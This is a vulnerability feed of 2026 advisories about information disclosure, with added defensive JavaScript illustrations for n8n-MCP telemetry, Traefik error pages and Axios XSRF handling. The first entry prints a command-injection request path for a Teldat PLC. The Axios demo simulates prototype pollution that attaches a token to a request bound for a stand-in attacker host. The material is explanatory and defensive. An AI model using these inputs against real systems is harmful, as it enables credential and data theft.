An attacker with access via network to the Regesta Smart HD-PLC of the provider Teldat (in this case, NO registration action is required) who has the vulnerable software could obtain privilege information by using the command Version via the path: /upgrade/query.php?cmd=p+3&3Bversion resulting in a information disclosure. This issue affects Regesta Smart HD-PLC - TLDPH16D2: 11.02.05.10.02.
Published 2026-06-17
- MediumCVSS 6.5 v3·EPSS 0.3%·No fix yet
Insertion of sensitive information into sent data vulnerability in MarketingFire Widget Options allows Retrieve Embedded Sensitive Data. This issue affects Widget Options: from n/a through 4.0.1.
Published 2026-06-17
- MediumCVSS 6.5 v3·EPSS 0.2%·No fix yet
Unauthenticated Sensitive Data Exposure in GetGenie <= 4.4.1 versions.
Published 2026-06-16
- HighCVSS 7.5 v3·EPSS 0.2%·No fix yet
Unauthenticated Sensitive Data Exposure in ABC Crypto Checkout <= 1.8.2 versions.
Published 2026-06-15
- HighCVSS 7.5 v3·EPSS 0.2%·No fix yet
Unauthenticated Sensitive Data Exposure in Affiliates Manager <= 2.9.50 versions.
Published 2026-06-15
- HighCVSS 7.4 v3·EPSS 0.3%·No fix yet
Subscriber Sensitive Data Exposure in Chatway Live Chat – AI Chatbot, Customer Support, FAQ & Helpdesk Customer Service & Chat Buttons <= 1.4.8 versions.
Published 2026-06-15
- MediumCVSS 6.5 v3·EPSS 0.3%·No fix yet
Subscriber Sensitive Data Exposure in XCloner <= 4.8.6 versions.
Published 2026-06-15
- HighCVSS 7.5 v3·EPSS 0.3%·No fix yet
Unauthenticated Sensitive Data Exposure in Bookly <= 27.4 versions.
Published 2026-06-15
- HighCVSS 7.5 v3·EPSS 0.3%·No fix yet
Unauthenticated Sensitive Data Exposure in Simply Schedule Appointments < 1.6.11.2 versions.
Published 2026-06-15
- HighCVSS 7.5 v3·EPSS 0.3%·No fix yet
Unauthenticated Sensitive Data Exposure in Amelia <= 2.2 versions.
Published 2026-06-15
- HighCVSS 7.5 v3·EPSS 0.4%·No fix yet
Unauthenticated Sensitive Data Exposure in Backup Migration <= 2.1.1 versions.
Published 2026-06-15
- HighCVSS 7.5 v3·EPSS 0.2%·No fix yet
Insertion of Sensitive Information Into Sent Data vulnerability in Stiofan GetPaid allows Retrieve Embedded Sensitive Data. This issue affects GetPaid: from n/a through 2.8.49.
Published 2026-06-15
- MediumCVSS 6.5 v3·EPSS 0.3%·Fix available
Mattermost versions 11.6.x <= 11.6.1, 11.5.x <= 11.5.4, 10.11.x <= 10.11.15 fail to sanitize the Remote Cluster API response on PATCH operations, which allows authenticated users with the {{manage_secure_connections}} permission to obtain remote cluster authentication tokens via a PATCH request to the remote cluster endpoint.. Mattermost Advisory ID: MMSA-2026-00662
Published 2026-06-12
- HighCVSS 7.5 v3·EPSS 0.7%·Fix available
Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios’s Node.js HTTP adapter may forward a Proxy-Authorization header to a redirected origin during specific proxy-to-direct redirect flows. This affects Node.js usage, where an initial HTTP request is sent through an authenticated HTTP proxy, redirects are followed, and the redirected URL is no longer proxied. Under affected redirect shapes, the final origin can receive the proxy credential that was intended only for the outbound proxy. This vulnerability is fixed in 0.32.0 and 1.16.0.
Published 2026-06-11
- HighCVSS 7.5 v3·EPSS 0.5%·Fix available
Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios’ Node.js HTTP adapter can leak proxy credentials to a redirect target in affected versions. When a request is sent through an authenticated proxy, Axios may add a Proxy-Authorization header. If Axios then follows a redirect and the redirected request is no longer sent through that proxy, the stale Proxy-Authorization header can remain on the redirected request and be sent to the redirect target. This affects Node.js's use of Axios with automatic redirects enabled and an authenticated proxy configuration. Browser adapters are not affected. This vulnerability is fixed in 0.32.0 and 1.16.0.
Published 2026-06-11
- HighCVSS 8.3 v3·EPSS 0.2%·No fix yet
OpenMetadata is a unified metadata platform. Prior to version 1.12.4, a non-admin SSO user can trigger a TEST_CONNECTION workflow for a Database Service and receive, in the HTTP 201 response of POST /api/v1/automations/workflows, both the cleartext database password in request.connection.config.password and the ingestion bot JWT in openMetadataServerConnection.securityConfig.jwtToken. The leaked ingestion-bot token can then be reused as Authorization: Bearer <jwt> to access sensitive service APIs with bot-level privileges. This issue has been patched in version 1.12.4.
Published 2026-06-08
- MediumCVSS 6.5 v3·EPSS 0.2%·No fix yet
IRIS is a web collaborative platform that helps incident responders share technical details during investigations. Versions prior to 2.4.28 return sensitive data to the user which are not required for the client’s operation. Version 2.4.28 contains a patch.
Published 2026-06-04
- CVSS 3.1 v3·EPSS 0.2%·Fix available
Strawberry GraphQL is a library for creating GraphQL APIs. In versions 0.288.4 through 0.315.3, Strawberry's bundled GraphiQL template wrote values from the GraphiQL headers editor into the browser URL query string. If a user entered a sensitive header, such as `Authorization: Bearer <token>`, the value could become visible in browser history, copied links, and server/proxy/CDN access logs after a page reload or shared request. Version 0.315.4 patches the issue.
Published 2026-06-04
- HighCVSS 7.7 v3·EPSS 0.4%·Fix available
A vulnerability in mlflow/mlflow versions prior to 3.11.0 allows for the resolution of environment variables in AI Gateway secrets, which can be exploited to exfiltrate sensitive server-side environment credentials to an attacker-controlled endpoint. This issue arises because the `api_key` field in gateway secrets can accept `$ENV_VAR` references, which are resolved against the MLflow server's environment during runtime. The resolved secrets are then sent in provider authentication headers to the configured upstream `api_base`. This vulnerability can be exploited by low-privileged authenticated users in basic-auth deployments or by unauthenticated users in default deployments without `basic-auth`. The impact includes potential leakage of sensitive credentials such as cloud artifact credent
Published 2026-06-03
- MediumCVSS 6.5 v3·EPSS 0.3%·Fix available
LibreChat is an enhanced ChatGPT clone that supports multiple AI providers. In versions up to and including 0.8.3, users with only `VIEW` access to an MCP server can retrieve the server's decrypted admin-managed secrets through `GET /api/mcp/servers` and `GET /api/mcp/servers/:serverName`. The returned config includes plaintext values for `apiKey.key` and `oauth.client_secret`. This allows viewers of a shared MCP server to exfiltrate the underlying provider credentials. Version 0.8..4 contains a patch. Other remediations include: never returning decrypted admin-managed secrets to non-owners; redacting apiKey.key and oauth.client_secret from all API responses consider returning only boolean presence indicators for secrets, similar to the auth-values route pattern; and, if owners need to edi
Published 2026-06-02
- MediumCVSS 5.3 v4·EPSS 0.2%·No fix yet
NamelessMC is website software for Minecraft servers. In version 2.2.4, the profile page (modules/Core/pages/profile.php) processes wall post submissions and replies before verifying whether the viewer is authorized to access the profile. This allows any user with the profile.post permission to write wall posts to private or blocking profiles. Additionally, the reply branch does not verify that the target wall post belongs to the current profile, enabling attackers to inject replies into arbitrary wall posts owned by other profiles via a restricted profile URL. This is patched in version 2.2.5.
Published 2026-06-02
- HighCVSS 7.5 v3·EPSS 0.2%·No fix yet
Insertion of Sensitive Information Into Sent Data vulnerability in Logtivity Activity Logs Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity allows Retrieve Embedded Sensitive Data. This issue affects Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity: from n/a through 3.3.6.
Published 2026-06-01
- CVSS 3.4 v3·EPSS 0.2%·Fix available
In JetBrains YouTrack before 2026.1.13162 information disclosure was possible on fetchApp requests
Published 2026-05-29
- MediumCVSS 6.3 v3·EPSS 0.2%·No fix yet
ACM/MCE assisted-service writes raw referenced pull-secret contents into `InfraEnv.status.conditions[].message` when pull-secret validation fails. A namespace principal with the stock `view` ClusterRole cannot directly read Secrets, but can read `InfraEnv` objects and recover the referenced Secret's `.dockerconfigjson` data from status. This bypasses the Kubernetes/OpenShift RBAC separation between read-only namespace viewers and Secret readers. In the reproduced proof, the same ServiceAccount was denied `get` and `list` on Secrets, but recovered synthetic pull-secret `username`, `password`, `email`, and base64 `auth` fields through `InfraEnv.status`.
Published 2026-05-29
- Medium · CVSS 6.5 v3 · EPSS 0.3% · Fix available
n8n-MCP is an MCP server that provides AI assistants access to n8n node documentation, properties, and operations. Prior to 2.51.3, the workflow telemetry sanitizer could retain partial fragments of URL-shaped node parameters before sending workflow data to the project's anonymous telemetry backend. Values placed in HTTP-Request-style node parameters — such as customer or tenant identifiers, short secrets embedded in query strings, and signed request parameters — could therefore appear in stored telemetry, contrary to the collection boundary documented in PRIVACY.md. This vulnerability is fixed in 2.51.3.
Published 2026-05-29
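The "partial fragments" failure mode above, as an added example that is not n8n-MCP's sanitizer: a sanitizer that strips only the scheme and host leaves the path, query string and signed parameters in the telemetry payload, whereas one that treats any URL-shaped value as a unit drops the whole value. The n8n node type names follow n8n's naming convention; the sample workflow, the secret values and the placeholder strings are constructed for this illustration.

```javascript
// Added illustration, not n8n-MCP's code. Contrasts a host-only sanitizer with a
// whole-value sanitizer for HTTP-Request-style node parameters sent to telemetry.

// A value is URL-shaped if it has a scheme ("x://"), starts with "/", contains a
// dotted host optionally followed by a port and path, or carries "?" or "#".
// Deliberately broad: over-redacting telemetry is cheap, under-redacting is not.
const URL_SHAPED = /[a-z][a-z0-9+.-]*:\/\/|^\/|\b[\w-]+(?:\.[\w-]+)+(?::\d+)?(?:[/?#]|$)|[?#]/i;

// Naive: replaces only "scheme://host". Path, query and signature survive.
function sanitizeNaive(value) {
  if (typeof value !== 'string') return value;
  return value.replace(/https?:\/\/[^/\s?#]+/gi, '[host]');
}

// Strict: if any part of the value looks like a URL, replace the entire value.
// No substring of the original is ever kept.
function sanitizeStrict(value) {
  if (typeof value !== 'string') return value;
  return URL_SHAPED.test(value) ? '[redacted:url-shaped]' : value;
}

// Build the telemetry payload: node types and sanitized parameters only
// (the workflow name is not sent at all).
function sanitizeWorkflowForTelemetry(workflow, sanitize) {
  return {
    nodeCount: workflow.nodes.length,
    nodes: workflow.nodes.map((node) => ({
      type: node.type,
      parameters: Object.fromEntries(
        Object.entries(node.parameters || {}).map(([k, v]) => [k, sanitize(v)]),
      ),
    })),
  };
}

// Collection-boundary check: which known-sensitive substrings still appear
// anywhere in the serialized payload?
function survivingSecrets(telemetryPayload, secrets) {
  const body = JSON.stringify(telemetryPayload);
  return secrets.filter((s) => body.includes(s));
}

// Constructed workflow: a tenant id and a signed parameter in a query string,
// an expression-valued URL that carries no secret, and a non-HTTP node.
const sampleWorkflow = {
  name: 'sync orders',
  nodes: [
    { type: 'n8n-nodes-base.httpRequest',
      parameters: { method: 'GET', url: 'https://api.example.test/v1/orders?tenant=acme-4711&sig=ZmFrZS1zaWc' } },
    { type: 'n8n-nodes-base.httpRequest',
      parameters: { method: 'POST', url: '={{ $json.endpoint }}' } },
    { type: 'n8n-nodes-base.set', parameters: { keepOnlySet: true } },
  ],
};
const CONSTRUCTED_SECRETS = ['acme-4711', 'ZmFrZS1zaWc', '/v1/orders'];

function compare() {
  return {
    naive: survivingSecrets(sanitizeWorkflowForTelemetry(sampleWorkflow, sanitizeNaive), CONSTRUCTED_SECRETS),
    strict: survivingSecrets(sanitizeWorkflowForTelemetry(sampleWorkflow, sanitizeStrict), CONSTRUCTED_SECRETS),
  };
}

console.log(JSON.stringify(compare()));
```

With the naive sanitizer all three constructed secrets survive in the payload; with the strict one none do, while `method`, the boolean parameter and the expression-valued URL (no query string, no host) pass through unchanged. The design choice is to decide per value rather than per substring: once a value has been classified as URL-shaped, nothing from it is worth keeping in anonymous telemetry.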
- High · CVSS 7.3 v3 · EPSS 0.2% · No fix yet
Insertion of Sensitive Information Into Sent Data vulnerability in ZAYTECH Smart Online Order for Clover (clover-online-orders) allows Retrieve Embedded Sensitive Data. This issue affects Smart Online Order for Clover: from n/a through 1.6.0.
Published 2026-05-27
- Medium · CVSS 6.5 v3 · EPSS 0.3% · No fix yet
Insertion of Sensitive Information Into Sent Data vulnerability in Tom GenerateBlocks allows Retrieve Embedded Sensitive Data. This issue affects GenerateBlocks: from n/a through 2.1.0.
Published 2026-05-27
- Medium · CVSS 5.8 v3 · EPSS 0.4% · Fix available
Traefik is an HTTP reverse proxy and load balancer. Prior to 2.11.44, 3.6.15, and 3.7.0-rc.3, there is an information disclosure vulnerability in Traefik's errors (custom error pages) middleware. When the backend returns a response matching the configured status range, the middleware forwards the original request's complete header set, including Authorization, Cookie, and other authentication material, to the separate error page service rather than only the minimal context needed to render the error page. This behavior is undocumented: the documentation states only that Host is forwarded by default, so operators are not warned that sensitive credentials are shared across service boundaries. Deployments using the errors middleware with a distinct error page service may inadvertently expose
Published 2026-05-15
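The "minimal context" the advisory contrasts with the full header set, as an added example that is not Traefik's code. It models an errors middleware deciding what to hand to a separate error-page service, and includes the check an operator would run against what that service actually receives. The status-list syntax (`500-599`, `404`) follows Traefik's errors middleware; the allowlisted header names, the `x-error-status` header and the sample request are assumptions for this illustration.

```javascript
// Added illustration, not Traefik's code: forward only what an error page needs
// across the service boundary, and detect when credential headers crossed it.

// Headers that carry authentication material and must never reach the error service.
const CREDENTIAL_HEADERS = new Set([
  'authorization', 'proxy-authorization', 'cookie', 'x-api-key', 'x-auth-token',
]);
// Assumed allowlist: enough to render a localized error page, nothing more.
const ERROR_PAGE_ALLOWLIST = new Set(['host', 'accept', 'accept-language', 'user-agent']);

// Parse a Traefik-style status list ("500-599", "404") into [lo, hi] pairs.
function parseStatusRanges(spec) {
  return spec.map((s) => {
    const m = /^(\d{3})(?:-(\d{3}))?$/.exec(s.trim());
    if (!m) throw new Error(`bad status spec: ${s}`);
    const lo = Number(m[1]);
    const hi = m[2] ? Number(m[2]) : lo;
    return [lo, hi];
  });
}

function statusMatches(ranges, code) {
  return ranges.some(([lo, hi]) => code >= lo && code <= hi);
}

// Leaky behaviour (what the advisory describes): the original request's complete
// header set, Authorization and Cookie included, goes to the error service.
function forwardAllHeaders(reqHeaders) {
  return { ...reqHeaders };
}

// Hardened behaviour: allowlist only, credential headers dropped unconditionally,
// plus the one piece of context the page needs (assumed header name).
function forwardMinimalHeaders(reqHeaders, statusCode) {
  const out = {};
  for (const [name, value] of Object.entries(reqHeaders)) {
    const key = name.toLowerCase();
    if (CREDENTIAL_HEADERS.has(key)) continue;
    if (ERROR_PAGE_ALLOWLIST.has(key)) out[key] = value;
  }
  out['x-error-status'] = String(statusCode);
  return out;
}

// Operator check: run over the headers the error-page service logged for one
// request. A non-empty result means credentials crossed the service boundary.
function leakedCredentialHeaders(receivedHeaders) {
  return Object.keys(receivedHeaders)
    .map((h) => h.toLowerCase())
    .filter((h) => CREDENTIAL_HEADERS.has(h))
    .sort();
}

// Constructed request whose backend answered 503.
const sampleRequestHeaders = {
  Host: 'app.example.test',
  Accept: 'text/html',
  Authorization: 'Bearer eyJ-EXAMPLE',
  Cookie: 'session=abc123-EXAMPLE',
  'X-Api-Key': 'key-EXAMPLE',
};
const ranges = parseStatusRanges(['500-599', '404']);

function demo(code = 503) {
  if (!statusMatches(ranges, code)) return null; // error page not triggered
  return {
    leakyForward: leakedCredentialHeaders(forwardAllHeaders(sampleRequestHeaders)),
    hardenedForward: leakedCredentialHeaders(forwardMinimalHeaders(sampleRequestHeaders, code)),
    hardenedHeaders: forwardMinimalHeaders(sampleRequestHeaders, code),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Running it shows `authorization`, `cookie` and `x-api-key` crossing the boundary in the leaky path and nothing in the hardened one. Until a patched Traefik version is deployed, the same `leakedCredentialHeaders` logic applied to the error service's own request logs tells an operator whether the error service, and anything logging in front of it, has been receiving bearer tokens and session cookies.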
- CVSS 2.6 v3 · EPSS 0.1% · No fix yet
HCL AION is affected by a vulnerability where auto-complete functionality is enabled for certain input fields. This may allow sensitive information to be stored in the browser, potentially leading to unintended exposure under specific conditions.
Published 2026-05-14
- Medium · CVSS 5.1 v3 · EPSS 0.1% · No fix yet
HCL AION is affected by a vulnerability where sensitive backend infrastructure details may be exposed. Exposure of such information could reveal internal system architecture or configuration details, which may assist in further analysis or targeted actions under certain conditions.
Published 2026-05-14
- Medium · CVSS 5.1 v3 · EPSS 0.1% · No fix yet
HCL AION is affected by a vulnerability where certain operations may trigger out-of-band interactions, potentially resulting in unintended disclosure of sensitive information. Such behaviour may allow exposure of data to external systems under specific conditions.
Published 2026-05-14
- Medium · CVSS 5.3 v3 · EPSS 0.2% · No fix yet
Insertion of Sensitive Information Into Sent Data vulnerability in Saad Iqbal WP EasyPay (wp-easy-pay) allows Retrieve Embedded Sensitive Data. This issue affects WP EasyPay: from n/a through 4.3.0.
Published 2026-05-12
- Critical · CVSS 9.6 v3 · EPSS 0.5% · Fix available
Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. From versions 3.2.0 to before 3.2.11 and 3.3.0 to before 3.3.9, there is a missing authorization and data-masking gap in Argo CD's ServerSideDiff endpoint that allows an attacker with read-only access to extract plaintext Kubernetes Secret data from etcd via the Kubernetes API server's Server-Side Apply dry-run mechanism. This issue has been patched in versions 3.2.11 and 3.3.9.
Published 2026-05-07
- Medium · CVSS 4.6 v3 · EPSS 0.1% · No fix yet
HCL BigFix Service Management (SM) does not adequately sanitize or safely render spreadsheet files (CSV, XLS, XLSX) before processing or distributing them. An attacker could populate data fields which, when saved to a CSV file and opened in spreadsheet software that evaluates cell content as formulas, may attempt information exfiltration or other malicious activity. Note that current versions of Excel warn users about untrusted content.
Published 2026-05-06
- High · CVSS 7.7 v3 · EPSS 0.4% · Fix available
An issue was discovered in idrac in OpenStack Ironic before 35.0.1. During import, a user invoking molds can request authorization to be sent to a remote endpoint. The credential forwarded is a time-limited Keystone token (which provides access to all OpenStack services Ironic is authorized for); or basic credentials configured for molds storage. The fixed versions are 26.1.6, 29.0.5, 32.0.1, and 35.0.1.
Published 2026-05-05
- High · CVSS 7.7 v3 · EPSS 0.2% · No fix yet
Insertion of Sensitive Information Into Sent Data vulnerability in WPDeveloper Templately allows Retrieve Embedded Sensitive Data. This issue affects Templately: from n/a through 3.6.1.
Published 2026-04-27
- Medium · CVSS 5.4 v3 · EPSS 0.2% · Fix available
Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, the Axios library's XSRF token protection logic uses JavaScript truthy/falsy semantics instead of strict boolean comparison for the withXSRFToken config property. When this property is set to any truthy non-boolean value (via prototype pollution or misconfiguration), the same-origin check (isURLSameOrigin) is short-circuited, causing XSRF tokens to be sent to all request targets including cross-origin servers controlled by an attacker. This vulnerability is fixed in 1.15.1 and 0.31.1.
Published 2026-04-24
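The truthy-versus-strict decision described above, as an added example modelled on the behaviour the advisory reports; it is not Axios's source. The same-origin check is a stub that takes the page origin as a parameter instead of reading `window.location`, the cookie jar is a plain object, and the attacker URL, token and page origin are constructed for this illustration.

```javascript
// Added illustration, not Axios's code: why `withXSRFToken` must be compared
// with `=== true` rather than tested for truthiness.

// Stub for the same-origin check; the real one consults the page's location.
function isURLSameOrigin(url, origin) {
  return new URL(url, origin).origin === origin;
}

// Vulnerable decision: truthiness. Any truthy non-boolean (1, 'yes', {}) that
// reaches the config, by misconfiguration or prototype pollution, skips the
// same-origin check entirely.
function shouldAttachXsrfTruthy(config, origin) {
  const { withXSRFToken } = config;
  return !!withXSRFToken || (withXSRFToken !== false && isURLSameOrigin(config.url, origin));
}

// Hardened decision: only the literal boolean `true` opts out of the check;
// every other value still has to pass isURLSameOrigin.
function shouldAttachXsrfStrict(config, origin) {
  const { withXSRFToken } = config;
  return withXSRFToken === true || (withXSRFToken !== false && isURLSameOrigin(config.url, origin));
}

// Attach the XSRF header from the cookie jar if the given decision function says so.
function buildHeaders(config, origin, decide, cookieJar) {
  const headers = { ...(config.headers || {}) };
  const token = cookieJar[config.xsrfCookieName || 'XSRF-TOKEN'];
  if (token && decide(config, origin)) headers[config.xsrfHeaderName || 'X-XSRF-TOKEN'] = token;
  return headers;
}

// Scenario: a simulated prototype pollution makes every plain config object
// inherit a truthy withXSRFToken that nobody set explicitly. The pollution is
// confined to the try block and removed afterwards.
function runScenario() {
  const origin = 'https://app.example.test';           // constructed page origin
  const jar = { 'XSRF-TOKEN': 'tok-EXAMPLE' };         // constructed cookie jar
  const attackerUrl = 'https://attacker.example.net/collect';
  const results = {};
  Object.prototype.withXSRFToken = 1;                  // simulated pollution
  try {
    const cfg = { url: attackerUrl };                  // no withXSRFToken of its own
    results.truthyCrossOrigin = 'X-XSRF-TOKEN' in buildHeaders(cfg, origin, shouldAttachXsrfTruthy, jar);
    results.strictCrossOrigin = 'X-XSRF-TOKEN' in buildHeaders(cfg, origin, shouldAttachXsrfStrict, jar);
  } finally {
    delete Object.prototype.withXSRFToken;
  }
  // Sanity check: the strict rule still sends the token to the page's own origin.
  results.strictSameOrigin = 'X-XSRF-TOKEN' in buildHeaders({ url: '/api/me' }, origin, shouldAttachXsrfStrict, jar);
  return results;
}

console.log(runScenario());
```

The scenario prints `truthyCrossOrigin: true` (token sent to the attacker's host), `strictCrossOrigin: false`, and `strictSameOrigin: true`. The polluted value also bypasses nothing in the strict variant because `1 !== false` falls through to the origin comparison, which is exactly the path the truthy version short-circuited.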
- Medium · CVSS 4.3 v3 · EPSS 0.3% · Fix available
An improper authorization vulnerability was identified in GitHub Enterprise Server that allowed an authenticated attacker to determine the names of private repositories by their numeric ID. The mobile upload policy API endpoint did not perform an early authorization check, and validation error messages included the full repository name for repositories the caller did not have access to. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.21 and was fixed in versions 3.20.1, 3.19.5, 3.18.8, 3.17.14, 3.16.17, 3.15.21, and 3.14.26. This vulnerability was reported via the GitHub Bug Bounty program.
Published 2026-04-21
Uses NVD data but is not endorsed or certified by the NVD. EPSS scores courtesy of FIRST.org (https://www.first.org/epss). Source: CISA KEV Catalog.